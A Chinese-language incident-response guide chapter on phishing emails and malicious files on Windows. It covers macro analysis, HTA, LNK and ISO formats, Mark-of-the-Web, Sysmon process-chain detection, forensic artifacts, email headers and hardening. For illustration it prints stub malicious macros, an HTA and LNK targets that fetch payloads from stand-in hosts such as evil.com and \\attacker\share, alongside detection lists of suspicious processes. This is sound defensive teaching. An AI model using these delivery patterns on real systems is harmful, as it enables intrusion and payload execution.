钓鱼邮件与恶意文件执行
钓鱼邮件是Windows环境中最常见的初始入侵向量——理解从邮件到载荷执行的完整kill chain是IR的核心能力
本章覆盖: 邮件投递机制、Office宏分析、各类恶意文件格式、MotW机制、进程链分析、取证制品关联
交叉参考: 04-取证制品分析 | 10-PowerShell日志与脚本分析
一、钓鱼攻击Kill Chain概述
1.1 典型攻击链
1
| 邮件到达 → 用户打开附件/点击链接 → 宏/脚本执行 → 下载二阶段payload → 持久化 → C2通信
|
阶段1: 投递(Delivery) — 钓鱼邮件携带附件或链接
阶段2: 触发(Exploitation) — 用户启用宏/打开恶意文件/点击链接
阶段3: 安装(Installation) — 下载并执行后续payload, 建立持久化
阶段4: 命令与控制(C2) — 建立回连通道
IR的目标: 在每个阶段找到取证证据,还原完整攻击路径
1.2 常见投递方式
| 方式 |
文件类型 |
特点 |
| 直接附件 |
.doc/.docm/.xls/.xlsm |
传统宏攻击 |
| 压缩包附件 |
.zip/.rar/.7z(含密码) |
绕过网关扫描 |
| 链接下载 |
URL→.exe/.msi/.hta |
绕过附件检测 |
| ISO/IMG挂载 |
.iso/.img/.vhd |
绕过MotW(旧版) |
| LNK快捷方式 |
.lnk |
伪装为文档图标 |
| HTML Smuggling |
.html(内嵌Base64) |
浏览器端解码落地 |
| OneNote嵌入 |
.one |
2023年新兴攻击面 |
二、Office宏分析
2.1 VBA宏基础
恶意宏通常利用自动执行入口:
Auto_Open() — 工作簿打开时执行(Excel)
Document_Open() — 文档打开时执行(Word)
Auto_Close() / Document_Close() — 关闭时执行
Workbook_Open() — Excel事件处理
宏通过以下方式执行恶意操作:
Shell() 函数启动进程
WScript.Shell COM对象执行命令
CreateObject("Scripting.FileSystemObject") 文件操作
XMLHTTP / WinHTTP 下载文件
PowerShell 调用执行编码命令
2.2 宏提取与分析工具
1
2
3
4
5
6
7
8
9
10
11
| :: 安装oletools (Python)
pip install oletools
:: 提取并分析VBA宏
olevba suspicious.docm
:: 仅显示可疑关键词
olevba --decode suspicious.docm
:: 分析OLE流
oleid suspicious.doc
|
olevba自动标记的高危指标:
AutoExec: Auto_Open, Document_Open 等自动执行
Suspicious: Shell, CreateObject, Environ, PowerShell
IOC: URL, IP地址, 文件路径
Hex Strings: 十六进制编码的字符串(常用于混淆)
手动提取VBA (无工具时)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
Copy-Item "suspicious.docm" "suspicious.zip"
Expand-Archive "suspicious.zip" -DestinationPath "C:\IR\docm_extracted"
$word = New-Object -ComObject Word.Application
$word.Visible = $false
$doc = $word.Documents.Open("C:\IR\suspicious.docm")
foreach ($comp in $doc.VBProject.VBComponents) {
Write-Host "=== Module: $($comp.Name) ==="
Write-Host $comp.CodeModule.Lines(1, $comp.CodeModule.CountOfLines)
}
$doc.Close()
$word.Quit()
|
典型恶意宏示例分析
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
Sub Document_Open()
Dim cmd As String
cmd = "powershell -nop -w hidden -e " & Chr(83) & Chr(65) & Chr(66) & "..."
Dim wsh As Object
Set wsh = CreateObject("WScript.Shell")
wsh.Run cmd, 0, False
End Sub
Sub Auto_Open()
x = Environ("COMSPEC")
Shell x & " /c powershell -ep bypass -f \\attacker\share\payload.ps1", vbHide
End Sub
|
2.3 宏安全策略检查
1
2
3
4
5
6
7
|
Get-ItemProperty "HKCU:\Software\Microsoft\Office\*\Word\Security" -ErrorAction SilentlyContinue |
Select-Object PSPath, VBAWarnings, AccessVBOM, BlockContentExecutionFromInternet
Get-ItemProperty "HKCU:\Software\Microsoft\Office\*\Excel\Security" -ErrorAction SilentlyContinue |
Select-Object PSPath, VBAWarnings, AccessVBOM, BlockContentExecutionFromInternet
|
VBAWarnings值:
1 = 启用所有宏(危险!)
2 = 禁用所有宏但通知(默认)
3 = 仅启用数字签名的宏
4 = 禁用所有宏不通知
2022年起微软默认阻止来自互联网的Office宏(MotW标记的文件)
三、各类恶意文件格式详解
3.1 Office文档 (.doc/.docm/.xls/.xlsm/.pptm)
.doc(OLE格式) vs .docx(Open XML) — 旧格式.doc可直接嵌入宏
.docm/.xlsm 明确表示包含宏的Open XML文档
.xls 还可包含Excel 4.0宏(XLM Macro)——不使用VBA,更难检测
Excel 4.0 Macro检测:
1
2
3
4
5
| :: 使用olevba检测XLM宏
olevba --xlm suspicious.xls
:: 专用工具XLMMacroDeobfuscator
pip install XLMMacroDeobfuscator
xlmdeobfuscator -f suspicious.xls
|
3.2 HTA文件 (.hta)
HTML Application — 由mshta.exe执行,可包含VBScript/JScript
不受浏览器安全限制,拥有本地应用程序权限
1
2
3
4
5
6
7
8
9
10
|
<html>
<body>
<script language="VBScript">
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -nop -w hidden -enc JABjAGwA..."
self.close
</script>
</body>
</html>
|
检测: 进程树中出现 mshta.exe → cmd.exe / powershell.exe 是高度可疑的
1
2
3
4
5
6
|
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} |
Where-Object { $_.Properties[5].Value -match 'mshta\.exe' } |
Select-Object TimeCreated,
@{N='ParentProcess';E={$_.Properties[13].Value}},
@{N='CommandLine';E={$_.Properties[8].Value}}
|
3.3 LNK快捷方式 (.lnk)
可伪装图标为Word/PDF文档,双击执行嵌入的命令
目标命令字段有限(约260字符),但可用多种技巧扩展
1
2
3
4
5
6
7
8
|
$shell = New-Object -ComObject WScript.Shell
$lnk = $shell.CreateShortcut("C:\IR\suspicious.lnk")
Write-Host "Target: $($lnk.TargetPath)"
Write-Host "Arguments: $($lnk.Arguments)"
Write-Host "WorkingDir: $($lnk.WorkingDirectory)"
Write-Host "IconLocation: $($lnk.IconLocation)"
Write-Host "Description: $($lnk.Description)"
|
典型恶意LNK的Target:
1
2
3
| C:\Windows\System32\cmd.exe /c powershell -nop -w hidden -enc JABj...
C:\Windows\System32\mshta.exe http://evil.com/payload.hta
C:\Windows\System32\forfiles.exe /p C:\Windows /m notepad.exe /c "cmd /c powershell..."
|
3.4 ISO/IMG/VHD 磁盘镜像
Windows 10+可直接双击挂载ISO/IMG文件
关键: 挂载后内部文件不继承MotW标记(在旧版Windows中)
攻击者将恶意文件打包到ISO中绕过MotW保护
2022年11月Windows更新后ISO内文件也会传播MotW
检测ISO挂载:
1
2
3
4
5
6
7
8
9
10
|
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-VHDMP-Operational'} -ErrorAction SilentlyContinue |
Select-Object TimeCreated, Message -First 20
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1} |
Where-Object { $_.Properties[10].Value -match '^[D-Z]:\\' } |
Select-Object TimeCreated,
@{N='Image';E={$_.Properties[4].Value}},
@{N='CommandLine';E={$_.Properties[10].Value}}
|
3.5 其他格式
.chm (Compiled HTML Help): 可嵌入JS/VBS,由hh.exe执行
.wsf / .wsh / .vbs / .js: Windows Script Host文件,由wscript/cscript执行
.msi: Windows Installer包,可包含Custom Action执行任意代码
.cab: 压缩包,可被expand.exe解压后执行内容
.application / .appref-ms: ClickOnce部署,可下载执行.NET应用
.one (OneNote): 可嵌入文件对象,双击执行; 2023年攻击激增
统一检测策略: 监控非常见父进程(如hh.exe, wscript.exe, cscript.exe, msiexec.exe)创建子进程
四、Mark-of-the-Web (MotW) 与 Zone.Identifier
4.1 MotW机制
Windows通过NTFS Alternate Data Stream (ADS) Zone.Identifier 标记文件来源
当文件来自互联网(浏览器下载、邮件附件保存),会被标记Zone=3
MotW触发Office的Protected View和宏阻止
Zone值:
0 = 本地计算机
1 = 本地Intranet
2 = 受信任站点
3 = Internet (触发保护)
4 = 受限站点
4.2 检查Zone.Identifier
1
2
3
4
5
6
7
|
Get-Content "C:\Users\victim\Downloads\suspicious.docm" -Stream Zone.Identifier
|
1
2
3
4
5
6
7
8
9
10
11
12
13
|
Get-ChildItem "C:\Users\*\Downloads\*" -Recurse -ErrorAction SilentlyContinue |
ForEach-Object {
$zone = Get-Content $_.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue
if ($zone) {
[PSCustomObject]@{
File = $_.FullName
LastWriteTime = $_.LastWriteTime
Size = $_.Length
ZoneInfo = ($zone -join ' | ')
}
}
} | Format-Table -AutoSize
|
1
2
| :: 使用dir /r查看ADS (Alternate Data Streams)
dir /r "C:\Users\victim\Downloads\"
|
4.3 MotW绕过手法
ISO/IMG/VHD挂载: 旧版Windows中挂载后内容不继承MotW
容器格式(.7z, .cab): 某些解压工具不传播MotW
用户手动移除: 右键→属性→解除锁定(Unblock)
程序移除: 攻击者在脚本中调用 Unblock-File 或删除ADS
CVE-2022-41091: 绕过MotW的已知漏洞
检测MotW被移除:
1
2
3
4
5
|
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} |
Where-Object { $_.Properties[8].Value -match 'Unblock-File|Zone\.Identifier' } |
Select-Object TimeCreated, @{N='Cmd';E={$_.Properties[8].Value}}
|
4.4 MotW在IR中的价值
ReferrerUrl: 记录下载来源URL,可能直接指向钓鱼页面
HostUrl: 实际下载地址
即使文件已被删除,$MFT中的ADS记录仍可能存在
结合浏览器历史记录交叉验证下载来源
五、进程链分析
5.1 典型恶意进程链
1
2
3
4
5
6
7
| 正常: explorer.exe → WINWORD.EXE(用户双击文档)
异常: WINWORD.EXE → cmd.exe → powershell.exe(宏执行)
异常: WINWORD.EXE → powershell.exe -enc ...(直接PS调用)
异常: WINWORD.EXE → mshta.exe http:
异常: WINWORD.EXE → certutil.exe -urlcache ...(下载payload)
异常: WINWORD.EXE → rundll32.exe(DLL执行)
异常: outlook.exe → WINWORD.EXE → cmd.exe(邮件→文档→命令)
|
核心规则: Office进程(WINWORD.EXE, EXCEL.EXE, POWERPNT.EXE)不应创建以下子进程:
cmd.exe, powershell.exe, pwsh.exe
mshta.exe, cscript.exe, wscript.exe
certutil.exe, bitsadmin.exe
rundll32.exe, regsvr32.exe
schtasks.exe, net.exe
5.2 使用Sysmon分析进程树
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
$officeProcs = @('WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE', 'MSACCESS.EXE')
$suspiciousChildren = @('cmd.exe', 'powershell.exe', 'pwsh.exe', 'mshta.exe',
'cscript.exe', 'wscript.exe', 'certutil.exe', 'bitsadmin.exe',
'rundll32.exe', 'regsvr32.exe', 'schtasks.exe')
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1} |
ForEach-Object {
$parentImage = Split-Path $_.Properties[20].Value -Leaf
$childImage = Split-Path $_.Properties[4].Value -Leaf
if ($officeProcs -contains $parentImage -and $suspiciousChildren -contains $childImage) {
[PSCustomObject]@{
Time = $_.TimeCreated
ParentProcess = $_.Properties[20].Value
ChildProcess = $_.Properties[4].Value
CommandLine = $_.Properties[10].Value
User = $_.Properties[12].Value
}
}
} | Format-List
|
5.3 使用Security日志分析 (无Sysmon时)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} |
Where-Object {
$newProc = $_.Properties[5].Value
$parentProc = $_.Properties[13].Value
($parentProc -match 'WINWORD|EXCEL|POWERPNT|OUTLOOK') -and
($newProc -match 'cmd\.exe|powershell|mshta|cscript|wscript|certutil|rundll32')
} |
Select-Object TimeCreated,
@{N='Parent';E={$_.Properties[13].Value}},
@{N='NewProcess';E={$_.Properties[5].Value}},
@{N='CommandLine';E={$_.Properties[8].Value}},
@{N='User';E={$_.Properties[1].Value}} |
Format-List
|
5.4 进程链可视化重建
工具推荐:
Process Monitor (ProcMon): 实时监控,可设置Boot Logging
Sysmon + Sysmon View: 可视化进程树
Timeline Explorer: 加载CSV进行时间线分析
APT-Hunter: 自动化evtx分析,自动标记可疑进程链
手动重建进程树:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
$procs = Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1} |
Select-Object TimeCreated,
@{N='PID';E={$_.Properties[3].Value}},
@{N='Image';E={$_.Properties[4].Value}},
@{N='CommandLine';E={$_.Properties[10].Value}},
@{N='ParentPID';E={$_.Properties[19].Value}},
@{N='ParentImage';E={$_.Properties[20].Value}}
function Get-ProcessChain {
param([string]$TargetPID)
$chain = @()
$current = $procs | Where-Object { $_.PID -eq $TargetPID } | Select-Object -First 1
while ($current) {
$chain += $current
$current = $procs | Where-Object { $_.PID -eq $chain[-1].ParentPID } | Select-Object -First 1
if ($chain.Count -gt 20) { break }
}
$chain | Format-Table Time, PID, ParentPID, Image, CommandLine -AutoSize
}
|
六、取证制品关联分析
6.1 Prefetch分析
Prefetch记录程序执行历史(路径: C:\Windows\Prefetch\)
关键信息: 程序名、执行次数、最后执行时间、加载的文件/目录列表
1
2
3
4
5
6
7
8
9
10
|
$suspiciousNames = @('POWERSHELL', 'CMD', 'MSHTA', 'CSCRIPT', 'WSCRIPT',
'CERTUTIL', 'BITSADMIN', 'RUNDLL32', 'REGSVR32')
Get-ChildItem "C:\Windows\Prefetch\*.pf" |
Where-Object { $name = $_.BaseName.ToUpper()
foreach ($s in $suspiciousNames) { if ($name -match $s) { return $true } }
return $false
} |
Select-Object Name, LastWriteTime, CreationTime, Length |
Sort-Object LastWriteTime -Descending
|
使用PECmd (Eric Zimmerman)解析Prefetch:
1
2
| PECmd.exe -d "C:\Windows\Prefetch" --csv "C:\IR\" -q
:: 输出包含执行时间、运行次数、加载的文件列表
|
IR价值: Prefetch中的文件引用列表可显示恶意文档的完整路径(如 C:\Users\victim\Downloads\invoice.docm)
6.2 Amcache分析
Amcache.hve记录程序执行历史和文件元数据(SHA1哈希!)
路径: C:\Windows\AppCompat\Programs\Amcache.hve
IR价值: Amcache记录的SHA1可直接提交VT/恶意软件分析平台查询
6.3 Shimcache (AppCompatCache)
记录程序是否存在于系统上(不一定执行)
存储在注册表: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache
6.4 RecentDocs与JumpList
1
2
3
4
5
6
7
8
|
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.docm" -ErrorAction SilentlyContinue
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.doc" -ErrorAction SilentlyContinue
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Recent\*.lnk" |
Sort-Object LastWriteTime -Descending |
Select-Object Name, LastWriteTime -First 30
|
JumpList分析:
1
2
3
4
5
6
|
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Recent\AutomaticDestinations\*.automaticDestinations-ms" |
Sort-Object LastWriteTime -Descending |
Select-Object Name, LastWriteTime
|
6.5 Sysmon事件关联
| Event ID |
用途 |
| 1 |
进程创建(完整命令行+父进程+哈希) |
| 3 |
网络连接(下载payload时) |
| 7 |
Image Load(DLL加载,检测DLL注入) |
| 11 |
文件创建(payload落地) |
| 15 |
FileCreateStreamHash(ADS创建,含MotW) |
| 22 |
DNS查询(C2域名解析) |
| 23 |
文件删除(攻击者清理痕迹) |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=11} |
Where-Object { $_.Properties[4].Value -match 'WINWORD|EXCEL|POWERPNT' } |
Select-Object TimeCreated,
@{N='Process';E={$_.Properties[4].Value}},
@{N='TargetFile';E={$_.Properties[6].Value}} |
Format-List
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=15} |
Select-Object TimeCreated,
@{N='Process';E={$_.Properties[4].Value}},
@{N='TargetFile';E={$_.Properties[6].Value}},
@{N='Hash';E={$_.Properties[8].Value}} -First 20
|
七、邮件头分析基础
7.1 关键邮件头字段
1
2
3
4
5
6
7
| Return-Path: <actual-sender@evil.com> ← 实际发件服务器的信封发件人
Received: from mail.evil.com (1.2.3.4) ← 邮件传递路径(从下往上读)
From: "CEO Name" <ceo@company.com> ← 显示名(可伪造!)
Reply-To: attacker@evil.com ← 回复地址(不同于From则高度可疑)
Message-ID: <unique@sender-domain> ← 消息唯一标识
X-Originating-IP: 1.2.3.4 ← 发件人原始IP(部分邮件服务器添加)
Authentication-Results: ← SPF/DKIM/DMARC验证结果
|
7.2 SPF/DKIM/DMARC检查
SPF (Sender Policy Framework): 检查发件IP是否在域名的SPF记录中
DKIM (DomainKeys Identified Mail): 验证邮件签名是否与域名公钥匹配
DMARC: 基于SPF+DKIM的策略,定义验证失败时的处理方式
1
2
3
4
| Authentication-Results: mx.company.com;
spf=fail (sender IP 1.2.3.4 not permitted) ← SPF失败=可疑
dkim=fail (signature not valid) ← DKIM失败=可疑
dmarc=fail (p=reject) ← DMARC失败=可疑
|
所有三项验证都失败 → 大概率是伪造/恶意邮件
7.3 从Exchange/Outlook提取邮件
1
2
3
4
5
6
7
8
9
10
11
|
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$inbox = $namespace.GetDefaultFolder(6)
$inbox.Items | Where-Object { $_.SenderEmailAddress -match 'evil\.com' } |
Select-Object Subject, SenderEmailAddress, ReceivedTime, Attachments |
Format-List
|
7.4 邮件附件哈希提取
1
2
3
4
5
6
7
8
9
10
11
|
$files = Get-ChildItem "C:\IR\attachments\*"
foreach ($f in $files) {
$md5 = (Get-FileHash $f.FullName -Algorithm MD5).Hash
$sha256 = (Get-FileHash $f.FullName -Algorithm SHA256).Hash
Write-Host "$($f.Name)"
Write-Host " MD5: $md5"
Write-Host " SHA256: $sha256"
Write-Host " VT URL: https://www.virustotal.com/gui/file/$sha256"
Write-Host ""
}
|
八、HTML Smuggling 检测
8.1 原理
攻击者将payload以Base64编码嵌入HTML文件中
用户用浏览器打开HTML时,JavaScript在客户端解码并自动触发下载
绕过网络层检测(传输的只是HTML文件)
常见于Nobelium/APT29、QakBot等高级攻击组
8.2 检测方法
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
Get-ChildItem "C:\Users\*\Downloads\*.html","C:\Users\*\Downloads\*.htm" -Recurse -ErrorAction SilentlyContinue |
Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) } |
ForEach-Object {
$content = Get-Content $_.FullName -Raw -ErrorAction SilentlyContinue
if ($content -match 'atob|Uint8Array|Blob|createObjectURL|application/octet-stream|saveAs') {
[PSCustomObject]@{
File = $_.FullName
LastWriteTime = $_.LastWriteTime
SuspiciousPatterns = ($Matches.Values -join ', ')
Size = $_.Length
}
}
}
|
浏览器日志中会显示本地文件访问(file://协议)后紧跟文件下载
九、实战分析流程 - 钓鱼邮件IR SOP
Step 1: 确认钓鱼邮件
获取原始邮件(.eml/.msg),分析邮件头
检查SPF/DKIM/DMARC结果
提取附件或URL
记录: 发件人、收件人列表、发送时间、主题
Step 2: 附件/URL分析
计算文件哈希,查询VT/Malware Bazaar
沙箱运行(ANY.RUN, Hybrid Analysis)
URL查询(urlscan.io, VirusTotal URL scan)
olevba分析宏内容
Step 3: 受影响主机排查
确认哪些用户打开了附件(Prefetch, Amcache, RecentDocs)
检查MotW/Zone.Identifier确认文件来源
分析进程链(Sysmon/4688)确认是否执行了恶意代码
检查PowerShell 4104日志确认后续操作
Step 4: 确定影响范围
搜索同一发件人发送给其他用户的邮件
检查是否有横向移动迹象 → 15-横向移动检测
检查C2通信(网络日志、DNS日志)
Step 5: 遏制与清除
隔离受影响主机
在邮件网关中阻止发件人/域名/附件哈希
撤回已投递的邮件(Exchange: Search-Mailbox -DeleteContent)
清除恶意文件和持久化机制
重置受影响账户密码
Step 6: 加固
阻止Office宏(GPO: Block macros in Office files from Internet)
启用ASR规则(Attack Surface Reduction):
1
2
3
4
5
6
|
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-4529-8536-B80A7769E899 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 -AttackSurfaceReductionRules_Actions Enabled
|
部署邮件沙箱(如Microsoft Defender for Office 365 Safe Attachments)
员工安全意识培训